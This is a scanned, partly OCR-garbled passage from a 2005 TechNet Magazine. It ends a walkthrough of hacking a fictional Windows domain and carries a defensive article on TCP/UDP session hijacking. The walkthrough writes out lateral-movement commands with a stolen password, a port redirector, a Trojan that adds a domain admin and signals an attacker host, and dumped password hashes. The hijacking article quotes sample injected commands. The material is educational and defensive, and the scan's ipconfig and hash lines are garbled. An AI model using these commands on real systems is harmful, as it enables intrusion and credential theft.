~ account there with that name, 


because the account domains are PYN- 
DMZ but the hostname is PYN-DMZ-DC. 
By default, Windows Server 2003 DCs are 
configured for down-level compatibility. 


| They let anonymous users access all infor- 
' mation except for the list of users who are | 


administrators. For completeness, we can 
also do a port scan: 


C:\warez>portscan 172.17.0.2 
Port 172.17.0.2:53 open 

Port 172.17.0.2:135 open 
Port 172.17.0.2:139 open 
Port 172.17.0.2:389 open 
Port 172.17.0.2:445 open 
Port 172.17.0.2:3268 open 


Since port 3268 is listening, this must be 


a Global Catalog server for the forest. This 


means that 172.17.0.2 is a highly valuable 
target. Interestingly, this sys- 
tem does not have Terminal 
Services enabled. 

I still do not know where 
the _ids account is used, so 
[ll just have to try it. There is 
no point in trying it on the 
DC since I know there is no 


so I try it on the Web server. 
Before I can do that, I need 
the hostname on the Web 
server. For this I use a custom 


- tool, GetSystemInfo: 


C:\warez>GetSystemInfo 172.17.0.1 
Server info on 172.17.0.1 


Name: PYN-WEB 
Domain: PYN-DMZ 
Version: 5.2 
Platform ID: 500 
Comment: 

Server Flags: 
Workstation 

Server 


Dial-in Server 

GetSystemInfo is a very simple tool that 
merely connects to the system and asks for 
information in the HKLM\Software\Mi- 
crosoft\Windows NT\CurrentVersion key. 
From this you see that the system is called 
PYN-WEB. I still don’t know exactly how 
to hack this box, but ll try one more thing: 


C:\warez>serviceuser \\PYN-WEB 
IDS PYN-DMZ\_ids 


I almost have the info I need because the 


Web server is also running the IDS service 


under the same account. That’s all I need to 
try the _ids account: 


C:\warez>net use \\172.17.0.1\c$ /u:pyn- 
dmz\_ids idsPasswd! 
The command completed successfully. 


As you can see, I have successfully taken 


over the Web server! Now my objective 
changes to taking over the domain itself 
and in turn getting to the corporate do- 
main from there. 


Owning the Domain 

So far I own the database server and the 
Web server (everything except the domain 
controller in fact). But what have I really 
gained with the Web server? To find out, I 
need to start by uploading my tools to it 
and getting a remote command shell on that 


| system just like I did on the database server. 


It is just a bit simpler now that I have an 


| administrative SMB connection to the Web 


server. SMB allows easy access to the Web 
server. For example, J can now 
schedule a command or 
launch some form of portable 
remote command shell. 
Once I have a local shell, I 
can use all the normal tools 
that I know and love. For ex- 
ample, I can easily find out 
who all the local administra- 
tors are. There are not many 
accounts here, as you can see 
in Figure 10. I only see the 
service account I’ve already 
found, the local administra- 
tor, and the domain admins. That probably 
means that when they need to administer 
the system, they use a domain administra- 
tor account. This means it might be pos- 
sible to use a Trojan horse program to make 
one of those users take over the domain for 
us. Generally speaking, an attacker would 
rather use a direct attack, since they pro- 
duce faster results. If all else fails, however, I 
will resort to a passive attack to accomplish 
my goal. You may have noticed by now that 


_ [have not seen so much as a dialog box. 


Cant I do some GUI hacking for a change? 
Sure. There are some tricks to it, though. 


Figure 10 Find Local Admin 


C:\warez>net localgroup administrators 
Alias name administrators 

Comment Administrators have complete and 
unrestricted access to the computer/domain 
Members 

Administrator 

PYN_DMZ\_ids 

PYN-DMZ\Domain Admins 

The command completed successfully. 


Figure 11 lpconfig Output for PYN-DMZ-DC 


C:\warez>ipconfig /all 


Windows IP Configuration 


Rost NOMG yk ee we we oe w of S PENEDM DE 
Primary Dns Suffix ...... . : PYN-DMZ.LOCAL 
Node Type. .......... . 3 Unknown 

TP Routing: Enablieds .. ae « acer 4 : Yes 

WINS Proxy Enabled... ..... : No 

DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL 


Ethernet adapter CorpNet: 


Connection-specific DNS Suffix 


Description. .......... : Intel 21140-Based PCI Fast Ethernet Adapter (Generic) #2 


Physical Address... .... . . : 00-03-FF-06-3E-FO 
DHGPSENaDN dest. wes wee aoe: ae es : No 

IP Address: 2 & ea ho ea ww vf 10216 

Subnet. Mask a sw a ue ewe we a FOES 2GE 2550 


Default Gateway «cw. sk ee 
DNS-SOrWORS: oo oe ce we 2 TROLL 


Ethernet adapter DMZNet: 


Connection-specific DNS Suffix 


Description. .......... + Intel 21140-Based PCI Fast Ethernet Adapter (Generic) 


Physical Address... ... . . . + 00-03-FF-07-3E-F0 
DHCP ‘Enabled... 6 23 ht 2 we « 9 NO 

TPLAGdReSS(: Sie wwe «hoo eo oT OGe 

Subnet: Mask ac 4 22 2 ka eos 4. 96125552557:255.50 
Default Gateway... ...... 2 :172.17.0.1 
DNSAS@RVERSei ies dean oo peak ow te UZ 


Recall that there were only two ports 
open on the firewall, 80 and 443. Since 
nothing was listening on port 443 on the 
Web server, I can establish a listener on that 
port without disrupting operations and risk 
tipping off the legitimate administrators. 
Rebinding terminal services to use that port 
would be highly noticeable. 

Windows Terminal Services (using Re- 
mote Desktop Protocol) listens on port 
3389. A portscan of the database server re- 
veals that 3389 is indeed open: 

C:\warez>portscan 172.17.0.3 

Port 172.17.0.3:135 open 

Port 172.17.0.3:139 open 

Port 172.17.0.3:445 open 

Port 172.17.0.3:1433 open 

Port 172.17.0.3:3389 open 

I can't establish a direct connection to 
the database server; for one thing, it’s on a 
NAT’d network and is not directly acces- 
sible from the Internet. I can get there by 
putting a port redirector on the Web server. 
A port redirector takes traffic coming in on 
one port and directs it to another host on 
another port. In other words, I'll set up a 
port redirector on the Web server which 
will take incoming traffic on port 443 and 
send it to the SQL server on port 3389: 

C:\warez>socketpipe 443 88 3389 172.17.0.3 


www.technetmagazine.com 


With that socket open, all I do is estab- 
lish a Web server connection using Termi- 
nal Services Client: 

mstsc /v:192.168.2.30:443 

Now that I can log on with 
my _ids user account, I have 
the full power of a graphical 
user interface (which some 
would argue is somewhat less 
than the full power of a com- 
mand line, but no matter). 

Even with the GUI, I have 
not yet taken over the DC. I’m 
going to use a Trojan horse to 
take it over. To do so, I use a 


really evil custom tool. First, I'll register it 
on the Web server (172.17.0.1) over my ter- 
minal services connection: 


c:\warez>EvilTrojan -r 172.17.0.1 -a 
192.168.2.112 


The tool registers itself in the HKLM\ 
Software\Microsoft\Windows\Current- 
Version\Run key, and therefore runs every 
time a user logs on. If that user is a domain 
admin, it creates a new user account on the 
domain and then adds that account to 
the domain admins group. If it’s able to do 
so, it opens up the Messenger service and 
sends an administrative alert to the attacker 
(192.168.2.112 in our case). Lastly, it re- 
moves itself from the Run key to hide its 
tracks. All this happens while the adminis- 
trator is logging on, and therefore is com- 
pletely transparent to the administrator. In 
the end, the only thing left on the system to 
indicate that anything happened is a file 
called avcheck.exe that is located in the 
Windows directory. 

Obviously, some other backchannel no- 
tification can be used. In the real world, 
attackers often use Internet Relay Chat 
(IRC). Even a really subtle HTTP transac- 

tion can serve as notification. 
Now all I have to do is to wait 
fora domain administrator to 
log on. Once an administra- 
tor logs on, I get a handy suc- 
cess notification: 
C:\>nce -1 -p 80 
Succeeded in adding a user. 
User: attacker$ 
Password: "UareQwn3d!" 
Domain: PYN-DMZ 
DC: PYN-DNZ-DC 

The notification can be 
received any way I want. This 


Figure 12 Pwdump2 Output 


C:\warez>pwdump2.exe 


Administrator:500:624aac413795cdcl ff17365faflffe89 : b9e0cfceaf6d077970306a2fd88a7c0a::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0: : : 

krbtgt :502:aad3b435b51404eeaad3b435b51404ee : 28237 c666e4bb3cc96d670cadcal593b::: 
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee: cd072175763b0d5b3fbb152F57b96e7c::: 
FAjenstat:1106:daf058ae79085db217306d272a9441bb:c43325fdf7/cafacf02f6e3eaa7f5020::: 


AAlberts:1107:1df8f06dcf78bb3aaad3b435p51404ee : 2408F92ab284046ddcc6952755f449e2: : 


HAcevedo: 1108: dbff4b96d021df2f93e28745b8bf4ba6 : bbd9477810308a0b676F3cda91F10539::: 
MAlexander:1109:d278e69987353c4c837daf3f2ddd5ca3:2c67b571425751747e7ae379fefedfcc::: 
KAkers:1110:693de7320aae76293e28745b8bf4ba6 : fb853a32ccd2b92b43639b0e7d29e09d: : : 
TAdams :1111:ea03148efb24d7 fc5be30f58d2a941d5: 18cce97ee181d42be654133658723813::: 
KAbercrombie:1112:6c32f38de08f49026f8092a33daaf05:a88b78471261477e26d9e4c11571b127::: 
Sculp:1113:49901659efc5eld6aad3b435b51404ee: d986300c7c0c33d3cc5417dbac6f90db: : : 

SAbbas :1114:d6855d70abc371c2b77b4e7109416ab8: 363c93e6be7a5cb00le7ad542c292F26::: 


Winter 2005 33 


Securing global business communications made simple. 


www.sybari.com 


800.239.1095 @S ybari 


particular Trojan simply opens a socket to 


port 80 on the attacker's host and sends the — 
notification to it. Notifications could been- | 


crypted, encoded, come over just about any 
port or protocol, and altered in a myriad of 
ways. For instance, notifications to an IRC 
chat channel are quite common. 

At this point, the DMZ domain has fallen 
and I have taken over the domain control- 
ler. Remember, this is the keeper of the keys 
to the kingdom and contains the user ac- 
counts database, among other things. In 
order to make use of this 
newfound power, I once 
again make the DC connect 
to me so I can get a remote 
shell. Once I do, I continue 
learning more about where I 
am, as is shown in Figure 11. 

This system is not only 
dual-homed, but it is dual- 
homed on the corporate net- 
work and the DMZ, which 
means it must be acting as the 
router between the two. Be- 
fore I take advantage of that fact, can dump 
out all the user accounts on the domain 
controller. Recall that earlier I learned that 
there were about 15 user accounts on the 
DC? Well, cycles are wasting, so I'd better 
dump out the password hashes and get to 
work cracking them. Since I have adminis- 
trative privileges, doing so is a simple mat- 
ter of running the very popular PWDump 
tool (see Figure 12). 

By default, Windows stores two different 
password representations: the LM “hash” 
(which is not a hash at all) and the Win- 
dows NT" hash. From this output, I can tell 
that this system stores the LM hashes. This 
is good news for a criminal hacker since 
LM hashes are so much easier to crack. 
Feeding this output into my favorite pass- 
word cracker, I can crack most of the pass- 
words on this system within 24 hours. In 
fact, in less than a minute, I’ve cracked three 
of them using a hybrid attack. A real at- 
tacker may crack passwords even faster. 
Tools are available that trade off storage 


www.technetmagazine.com 


space for cracking speed, greatly decreas- 
ing crack time. 

Now that I have the passwords, I need to 
find out more about where to use them. 
First, I know which systems are available on 
the 172.17.0/24 network, so let’s see what I 
can find on the 10.1.2/24 net: 


C:\warez>discoverHosts 10.1.2 
Reply from 10.1.2.16: bytes=32 time<lms TTL=128 
Reply from 10.1.2.17: bytes=32 time=54ms TTL=128 
16 is the datacenter DC as we've already 
learned, but 17 is a new host that we have 
not seen before. Let’s see if I 
can get some more informa- 
tion on it: 


C:\warez>GetSystemInfo 10.1.2.17 
Server info on 10.1.2.17 
Name: — PYN-CORPDC 
Domain: PYN 

Version: 5.2 
Platform ID: 500 
Comment: 

Server Flags: 
Workstation 

Server 

Domain Controller 

Time source 


17 is the domain control- 

ler I was looking for origi- 

nally. I can tell that it is running Windows 

Server 2003, but not much else about it. 

Perhaps dumping out the users will give me 

additional information, like that shown in 
Figure 13. 

As you can see, this system has a lot of 
users. Listed are several old friends who also 
had accounts on the DMZ DC. In fact, there 
are several whose passwords I have already 
cracked on the DMZ. At this juncture, I 
could either try to gather more informa- 
tion, or I could just be bold and try those 
accounts. Three guesses which of those op- 


tions a hacker would use: 
C:\warez>net use \\pyn-corpdc\c$ / 
u:pyn\GAlderson "yosemiTe*" 
The command completed successfully. 


This network has now been thoroughly 
hacked. I could go on and do whatever I 
came for, but from here on, it is mostly up 
to what the attacker wants to do. Potential 
options would be to scavenge the network 


for data, steal confidential information, add | 


himself to the payroll, use the network to 
attack some other network such as a busi- 


Figure 13 Corp DC Dumpinfo 


C:\warez>dumpinfo 10.1.2.17 


The Administrator is: PYN\Administrator 


Users on PYN-CORPDC: 

RID 1000 PYN\HelpServicesGroup an Alias 
RID 1001 = PYN\SUPPORT_388945a0 a User 
RID 1002 PYN\TelnetClients an Alias 
RID 1003 PYN\PYN-CORPDC$ a User 
RID 1104 = PYN\FAjenstat a User 
RID 1105 PYN\AAlberts a User 
RID 1106 PYN\HAcevedo a User 
RID 1107 PYN\MAlexander a User 
RID 1108 PYN\KAkers a User 
RID 1109 = PYN\TAdams a User 
RID 1110 PYN\KAbercrombie a User 
RID 1111 PYN\Sculp a User 
RID 1112 PYN\SAbbas a User 
RID 1113. PYN\MATTen a User 
RID 1114 PYN\JAdams a User 
RID 1115 = PYN\SAlexander a User 
RID 1116 = PYN\HAbolrous a User 
RID 1117. PYN\PAckerman a User 
RID 1118 PYN\GAlderson a User 
Share Type Comment 

IPC$ Unknown Remote IPC 
NETLOGON Disk Logon server share 
ADMINS Special Remote Admin 
SYSVOL Disk Logon server share 
C$ Special Default share 
Administrators: 


Unable to enumerate administrators 
ERROR: Access Denied 


ness partner, and so on. The attacker has 
complete and unrestricted access to the en- 
tire contoso.com network. 


Conclusion 

In this article, ’'ve examined how a Win- 
dows-based network might be hacked. I 
hasten to point out that Windows-based 
networks are no less secure than any other 
network. While the specific attacks used in 
this article are unique to Windows, minor 
modifications to the techniques and a new 
tool set would make the same compromise 
possible on a network running a different 
platform. The problem is not the platform 
itself, but the practices. All platforms are 
securable, but all networks are exploitable 
if they are not architected and implemented 
carefully. Poor implementation is always 
poor implementation, regardless of the un- 
derlying platform. ® 


Winter 2005 35 


Kevin Lam, David LeBlanc, and Ben Smith 


Hacking: Fight Back 


| 
| 


Theft On The Web: 


Prevent Session 
Hijacking 


“How does this work?” 


e ICP hijacking mechanics 

¢ ACK packet storms 

e UDP attacks 

e Network attack prevention 


Kevin Lam, David LeBlanc, and Ben Smith all work on 
Security at Microsoft. Ben is the coauthor of Microsoft 
Windows Security Resource Kit and David is the 
coauthor of Writing Secure Code 2 (both from Microsoft 
Press). This article is adapted from Chapter 21 of 
Assessing Network Security (Microsoft Press, 2004). 


AT A GLANCE 


36 TechNet Magazine 


How do you know that an attacker has not taken over the session between 
the computers and is passively monitoring the conversation, or even changing 
it? You would certainly know it—belatedly—if the order for 1,000 widgets 
that you sent to a business partner was received as an order for 100,000 
widgets. This can happen, courtesy of a well-timed strike by an intruder. 

Right now, you might be asking: 


“Is my network susceptible to this?” 
“What can I do to prevent this from 
happening?” 

Session hijacking works by taking advan- 
tage of the fact that most communications 
are protected (by providing credentials) at 
session setup, but not thereafter. These at- 
tacks generally fall into three categories: 
Man-in-the-middle (MITM), Blind Hijack, 
and Session Theft. 

In MITM attacks, an attacker intercepts 


When computers need to talk to each other, they simply do so. 
But, how do you know that your computer is really talking to 
the computer it thinks it's talking to? 


all communications between two hosts. 
_ With communications between a clientand 
_ server now flowing through the attacker, he 
_ or she is free to modify their content. Pro- 
 tocols that rely on the exchange of public 
_ keys to protect communications are often 
_ the target of these types of attacks. 


In blind hijacking, an attacker injects data 


such as malicious commands into inter- 
_ cepted communications between two hosts 
~ commands like “net.exe localgroup admin- 
" istrators /add EvilAttacker”. This is called 
_ blind hijacking because the attacker can 
_ only inject data into the communications 
_ stream; he or she cannot see the response 
to that data (such as “The command com- 
_ pleted successfully’) Essentially, the blind 
hijack attacker is shooting data in the dark, 


but as you will see shortly, this method of 
hijacking is still very effective. 

Ina session theft attack, the attacker nei- 
ther intercepts nor injects data into exist- 
ing communications between two hosts. 
Instead, the attacker creates new sessions 
or uses old ones. This type of session hi- 
jacking is most common at the application 
level, especially Web applications. 

Session hijacking at the network level is 
especially attractive to attackers. They do 
not need host access, as they do with host- 
level session hijacking. Nor do they need to 
customize attacks on a per-application ba- 
sis, as they do at the application level. Net- 
work-level session hijacking attacks allow 
attackers to remotely take over sessions, 
usually undetected. But successfully hijack- 
ing a session at the network level requires 
an attacker to overcome various obstacles, 
as you will see in the next few sections. 


Hijacking a TCP Session 

One of the key features of TCP is reli- 
ability and ordered delivery of packets. To 
accomplish this, TCP uses acknowledg- 
ment (ACK) packets and sequence num- 
bers. Manipulating these is the basis for 
TCP session hijacking. As we mentioned 
earlier, the MITM attacker simply needs to 
be positioned so that communications be- 
tween the client and the server are relayed 
through him or her. To understand how an 
attacker might sneak into the TCP session 
ina blind session hijack attack, you need to 
look at what happens when a client initiates 
a TCP session with the server. 

As shown in Figure 1, the client first ini- 
tiates a session with the server by sending a 
synchronization (SYN) packet to the server 
with initial sequence number x. The server 
responds with a SYN/ACK packet that con- 
tains the server’s own sequence number p 
and an ACK number for the client's origi- 
nal SYN packet. This ACK number indi- 
cates the next sequence number the server 
expects from the client. In our example, 
this is.x+J, because the client's original SYN 
packet counted as a single byte. The client 
acknowledges receipt of the SYN/ACK 
packet by sending back to the server an ACK 
packet with the next sequence number it 
expects from the server, which in this case 
is p+1 (the server's initial SYN packet se- 


www.technetmagazine.com 


quence number plus one). The client and 
server are ready to start exchanging data. 


The sequence number values just de- 
scribed are important for understanding | 


how to successfully hijack this session later, 
so pay close attention to them in the para- 
graphs that follow. The same goes for ACK 


Spoof the client's IP address 
Determine the correct sequence num- 
ber that is expected by the server from 
the client 
Inject data into the session before the 
client sends its next packet 

The first and second tasks are easily accom- 


TCP uses acknowledgment (ACK) packets and 
sequence numbers. Manipulating these is the 
basis for TCP session hijacking. 


numbers, which are key to understanding 
TCP ACK storms. 

For now, observe what happens to these 
sequence numbers when the client starts 
sending data to the server (see Figure 2). In 
order to keep the example simple, the client 
sends the character A in a single packet to 
the server. 

The client sends the server the single 
character ina data packet with the sequence 
number x+1. The server acknowledges this 
packet by sending back to the clientan ACK 
packet with number x+2 (x+J, plus 1 byte 
for the A character) as the next sequence 
number expected by the server. Enter the 
attacker. If the attacker wanted to inject data 
into the TCP session as the client, he or she 
would need to: 


plished, but the third is a bit trickier. Tricky, 
but not impossible. Essentially, the attacker 
needs a way to prevent the client from send- 
ing into the session new data that would 
shift sequence numbers forward. To do this, 
the attacker could just send the data to in- 
ject and hope it is received before the real 
client can send new data, as shown in Fig- 
ure 3. Or, he or she could perform a denial 
of service (DoS) attack on the client, or per- 
haps some tricks that use address resolu- 
tion protocol (ARP) spoofing. 

Here is how this might play out. The at- 
tacker sends a single Z character to the 
server with sequence number x+2. The 
server accepts it and sends the real client an 
ACK packet with acknowledgment num- 
ber x+3 to confirm that it has received the 


Client 


 ———= 


SYN, Sequence Number X 


SYN/ACK, Sequence Number P, 
Acknowledgment Number X+1 


ACK, Acknowledgment Number P+1 
|_ 


Server 


Figure 1 TCP Three-Way Handshake 


Client 


| (Seee oso 


PS : 


| Data: “A”, Sequence Number X+1 
3 


| Acknowledgment Number X+2 
Aaa 


Figure 2 Sending Data over TCP 


Winter 2005 37 


Client 


| See laa so ny 


i 


Attacker 


, (ae a ea ks oe 


Acknowledgment Number X+3 


Data: “Z", Sequence 
Number X+2 


Figure 3 Blind Injection 


Z character. When the client receives the 
ACK packet, it will be confused, either be- 
cause it did not send any data or because 
the next expected sequence is incorrect. 
(Maybe the attacker sent something “nice” 
like “my * which emacs* /vmunix && shut- 
down -r now” and not just a single charac- 
ter.) As you will see later, this confusion can 
cause a TCP ACK storm, which can disrupt 
anetwork. In any case, the attacker has now 
successfully hijacked this session. 
Attackers can automate the session hi- 

jacking process just described with tools 
suchas Juggernaut, by Mike Schiffman, and 
Hunt, by Pavel Krauz. 


Hijacking a UDP Session 
Hijacking a session over a User Datagram 
Protocol (UDP) is exactly the same as over 
TCP, except that UDP attackers do not have 
to worry about the overhead of managing - 
sequence numbers and other TCP mecha- 


nisms. Since UDP is connectionless, inject- 
ing data into a session without being de- 
tected is extremely easy. Figure 4 shows how 
an attacker could do this. 

DNS queries, online games like the 
Quake series and Half-Life, and peer-to- 
peer sessions are common protocols that 
work over UDP; all are popular targets for 
this kind of session hijacking. 


Determining Susceptibility 
One obvious way to determine the sus- 
ceptibility of your organization’s networks 
to network-level session hijacking attacks 
is to try to hijack actual network sessions 
using common attacker tools such as Jug- 
gernaut or Hunt. Using live attacker tools 
against your organization's production net- 
works, however, is not recommended. A 
safer approach would be simply to find out 
if your organization uses transport proto- 


' cols that do not use cryptographic protec- 


Client 


Forges a reply 
before the 
server replies 


UDP Request 


Server 


Attacker 


Figure 4 Session Hijacking over UDP 


38 TechNet Magazine 


tion (such as encryption) for transport se- 
curity or digital signatures for authentica- 
tion verification. Common examples of 
these protocols include Telnet, FTP, and 
DNS. If such network protocols exist in 


| your organization's networks, sessions trav- 
' eling over those unencrypted protocols are 
_ ripe for hijacking. 


What countermeasures can you take to 
reduce your susceptibility to network-level 
session hijacking attacks? One technique is 
to implement encrypted transport proto- 
cols such as Secure Shell (SSH), Secure 
Socket Layers (SSL), and Internet Protocol 


| Security (IPSec). An attacker attempting to 


hijack a session by tunneling in an en- 
crypted transport protocol must, ata mini- 
mum, know the session key used to protect 
that tunnel, which should be difficult to 
guess or steal. Any data the attacker can 


Protocols such as 
Telnet and FTP are 
extremely 
susceptible to 
hijacking when not 
protected inside 
encrypted tunnels. 


inject into network sessions without using 
the correct session key will be undecipher- 
able by the recipient and rejected accord- 
ingly. Even in the unlikely event that an 
attacker is able to attain the prized session 
key, digitally signing network traffic pro- 
vides an extra layer of defense against the 
successful injection of malicious data into 
network sessions. 

As a rule, do not communicate with 
highly critical systems unless you do so over 
protocols that use a strong encryption al- 
gorithm for secure transport. By themselves, 
protocols such as Telnet and FTP are poor 
choices, extremely susceptible to hijacking 


_ when not protected inside encrypted tunnels. 


Tricks and Techniques 
Successfully hijacking a network session 
depends on a few conditions falling into 
place, so an attacker has several tricks and 
techniques for creating these conditions. 


For instance, to conduct a true MITM at- 
tack, the attacker must get hosts to route 
traffic through him or her. To make this 
happen, he or she can use tricks with Inter- 
net Control Message Protocol (ICMP) Re- 
direct packets or ARP spoofing. 


As you read through the attack strategies 
discussed here, keep in mind that many can — 


be easily defeated by the countermeasures 
for network-level session hijacking. TCP 
ACK storms, for example, are not possible 
when the attacker cannot inject data into a 


session. Routing table modifications also — 


quickly become a wasted effort for an at- 
tacker if they cannot interpret or modify 
data that gets routed through them. It is still 
useful and interesting, however, to know 
what your enemy has in his or her bag of 
tricks. Some common items include TCP 
ACK packet storms, ARP table modifica- 
tions, TCP resynchronizations, and remote 
modifications of routing tables. 


TCP ACK Packet Storms 


If an attacker is not careful when hijack- 
ing TCP sessions in your organization's net- 
works, those networks can be disrupted by 
TCP ACK packet storms. 

To understand this threat, look at what 
happens when an attacker hijacks a TCP 
session from the TCP protocol’s point of 
view. Assume that the attacker has forged 
the correct packet information (headers, se- 
quence numbers, and so on) at some point 
during the session. When the attacker sends 
to the server-injected session data, the 
server will acknowledge the receipt of the 
data by sending to the real client an ACK 
packet. This packet will most likely contain 
a sequence number that the client is not 
expecting, so when the client receives this 
packet, it will try to resynchronize the TCP 
session with the server by sending itan ACK 
packet with the sequence number that it is 
expecting. This ACK packet will in turn 
contain a sequence number that the server 
is not expecting, and so the server will 
resend its last ACK packet. This cycle goes 
on and on and on, and this rapid passing 
back and forth of ACK packets creates an 
ACK storm, as shown in Figure 5. 

As the attacker injects more and more 
data, the size of the ACK storm increases 
and can quickly degrade network perfor- 


www.technetmagazine.com 


Client 


@ Acknowledges data with ACK packet 
ta 


© Confused client sends its last ACK 
to try to resynchronize 


@ and ® repeat over and over 


Attacker 


@ Injects data 
into session 


Figure 5 ACK Storm 


mance. If neither the attacker nor the client 
explicitly closes the session, the storm will 
likely stop itself eventually when ACK pack- 
ets are lost in the storm. 


ARP Table Modifications 


The address resolution protocol is used 
by each host onan IP network to map local 
IP addresses to hardware addresses or MAC 
addresses. Here is a quick look at how this 
protocol works. 

Say that Host A (IP address 192.168.1. 


100) wants to send data to Host B (IP ad- 
dress 192.168.1.250). No prior communi- 
cations have occurred between Hosts A and 
B, so the ARP table entries for Host B on 
Host A are empty. As shown in Figure 6, 
Host A broadcasts an ARP request packet 
indicating that the owner of the IP address 
192.168.1.250 should respond to Host A at 
192.168.1.100 with its MAC address. The 
broadcast packet is sent to every machine 
in the network segment, and only the true 
owner of the IP address 192.168.1.250 


@ Host A broadcasts ARP request 
asking which MAC address 
belongs to “192.168.1.250” 


Host A 


IP Address: 192.168.1.100 
MAC: AA:AA:AA:AA:AA:AA 


@ Host B responds with an ARP 
reply and indicates its MAC 
address is BB:BB:BB:BB:BB:BB 


Host B 


== 
IP Address: 192.168.1.250 
MAC: BB:BB:BB:BB:BB:BB 


© Host C ignores Host A's 
ARP request 


Host Cc 


yA 
IP Address: 192.168.1.50 
MAC: CC:CC:CC:CC:CC:CC 


Figure 6 Finding the Owner of a MAC Address 


Winter 2005 39 


@ Host A broadcasts ARP request 
asking which MAC address 
belongs to “192.168.1.250” 


Host A 


IP Address: 192.168.1.100 
MAC: AA:AA:AA:AA:AA:AA 


© Host A begins sending 
data intended for Host 
B to the attacker 


Switch 


Host B 


4 
IP Address: 192.168.1.250 
MAC: BB:BB:BB:BB:BB:BB 


@ Attacker forges a response 
before Host B can respond 


Attacker 


IP Address: 192.168.1.1 
MAC: EO:EO:EO:EO:EO:EO 


Figure 7 Spoofed Reply 
should respond. (As you will see shortly, 
this is not always the case.) All other hosts 
discard this request packet, but Host A re- 
ceives an ARP reply packet from Host B 
indicating that its MAC address is BB:BB: 
BB:BB:BB:BB. Host A updates its ARP 
table, and can now send data to Host B. 
Can you see the security problem here? 
Does Host A know that Host B really did 
send the ARP reply? The answer is no, and 
attackers take advantage of this. In our ex- 


ample, attackers could spoof an ARP reply 
to Host A before Host B responded, indi- 
cating that the hardware address E0:E0:E0: 
E0:E0:E0 corresponds to Host B’s IP ad- 
dress, as shown in Figure 7. Host A would 
then send any traffic intended for Host B to 
the attacker, and the attacker could choose 
to forward that data (probably after some 
tampering) to Host B. 

Attackers can also use ARP packet ma- 
nipulation to quiet TCP ACK storms, which 


are noisy and easily detected by devices such 
as intrusion detection system (IDS) sen- 
sors (see Figure 8). Session hijacking tools 
such as Hunt accomplish this by sending 
unsolicited ARP replies. Most systems will 
accept these packets and update their ARP 
tables with whatever information is pro- 
vided. In our Host A/Host B example, an 
attacker could send Host A a spoofed ARP 
reply indicating that Host B’s MAC address 
is something nonexistent (like C0:C0:C0: 
C0:C0:C0), and send Host B another 
spoofed ARP reply indicating that Host As 
MAC address is also something nonexist- 
ent (such as D0:D0:D0:D0:D0:D0). Any 
ACK packets between Host A and Host B 
that could cause a TCP ACK storm during 
anetwork-level session hijacking attack are 
sent to invalid MAC addresses and lost. 


TCP Resynchronizing 

To hide his or her tracks, an attacker who 
is finished with the session hijacking attack 
might want to resynchronize the commu- 
nicating hosts. The problem is that after the 
attack, the two hosts whose session was hi- 
jacked will be at different points in the ses- 
sion. In other words, each host will be 
expecting different sequence numbers. 

For example, the server might think that 
it is 40 bytes into the session when really 
the client might have sent only 29 bytes. 
Thus, the expected sequence numbers on 


MAC: AA:AA:AA:AA:AA:AA 


ACK storm packets sent 
to invalid MAC address 


Attacker sends Host A an 
ARP reply that indicates the 
MAC address to reach Host B 
is “CO:CO:CO:CO:CO:CO” 


ACK storm packets sent 
to invalid MAC address 


Attacker 


Attacker sends Host B an 
ARP reply that indicates the 
MAC address to reach Host A 
is “DO:DO:DO:DO:D0:DO” 


Same ad 
MAC: BB:BB:BB:BB:BB:BB 


Figure 8 Stopping a TCP ACK Storm 


40 TechNet Magazine 


each side will differ. Since sequence num- 
bers move in only a positive direction, it's 
not possible with TCP stacks to manipu- 


late the server so that its expected sequence | 
number moves downward to match the — 


client’s sequence number. 
In this situation, the attacker needs some 


restore the correct values to the ARP table 


To protect Windows hosts from forged 
ICMP redirect attacks, set the 
EnableiCMPRedirect value to 0. 


way to move the client’s sequence numbers 


to match the servers. Tools like Hunt try to 


solve this problem by sending a message to 


the client. Here is an example (note that the — 


number 13 is used arbitrarily): 


msg from root: power failure - 
chars 


try to type 13 


Hunt will replace this value with whatever 


number of bytes the client is required to | 
send to be resynchronized with the server. 
The hope is that the user will comply. When | 


the user has typed enough characters, Hunt 
will use more forged ARP reply packets to 


well-educated users or any protocol other 
than Telnet or possibly FTP. 


Remotely Modifying 
Routing Tables 


As discussed earlier, an attacker who 


wants to hijacka session at the network level 
wants to route all communications between _ 
a client and server through him or her, mak- 


ing it easy to monitor, modify, and inject 
data into the session, as in MITM attacks. 
This boils down to the attacker tricking one 


of the hosts, usually the client, into routing — 


' all its session traffic through the attacker. 
entries it modified on the client and server _ 
/ toavoid TCP ACK storms. ! 

This technique of resynchronizing client | 
and server TCP stacks is dependent on the | 
- user following instructions sent by the Hunt | 
tool, and will probably not work against | 


When an attacker is local to the host whose 
traffic is being intercepted, one popular way 
to modify the routing table of the host is to 
forge ICMP Redirect (type 5) packets and 
advertise them as the route to take when 
sending data. 

To protect Windows’ hosts from forged 
ICMP redirect attacks, set the EnableICMP- 
Redirect value to 0 under the registry key 
HKLM\System\CurrentControlSet\Ser- 
vices\AFD\ Parameters. 


Conclusion 

Protecting network sessions that carry 
sensitive and important data such as credit 
card numbers, bank transactions, and ad- 
ministrative server commands is an impor- 
tant first step at improving the security 
posture of your organization. By removing 
an attacker's ability to inject data into those 
sessions, you raise the security bar and force 
your adversary to try other, more complex 
avenues that are less likely to compromise 
your organization's security. @ 


Yeah we're geeks 


when it comes to Web Hosting. 
It makes us better. 


In addition to having two Microsoft MVPs on 


Windows Server 2003 : ee 
staff, the entire support team is Microsoft 


Beer certified - giving our support specialists 
ASP.Net 1.1 the edge when satisfying your 
SQL Server hosting needs! 
ISAPI 
Custom COM . 
Webmail Sign up now for 20% 
Spam Blocking ° 
ohana off all shared hosting. 
Dedicated Offer valid only for new clients who sign up by 11/30/04 
and use TECHNET as the promotional code 
Webfarm when signing up online. ae 
# Tservice And Support a Orc S U Je b Microsoft 
www.orcsweb.com Powerful Web Hosting Solutions Partner 


www.technetmagazine.com Winter 2005 41 


YOU MAY NOT HAVE TIME TO STUDY 
THE TCO OF WINDOWS AND LINUX, 
BUT THE YANKEE GROUP DOES. 


Micresoft 


“For midsized and large organizations, a significant 
Linux deployment will neither be free nor easily 
accomplished. In fact, respondents at large 
organizations reported that a wholesale switch to 
Linux from Windows’ or Unix would significantly 


increase TCO for the forseeable future.” 


—Laura DiDio, The Yankee Group, April 2004 
Linux, Unix, and Windows TCO Comparison 


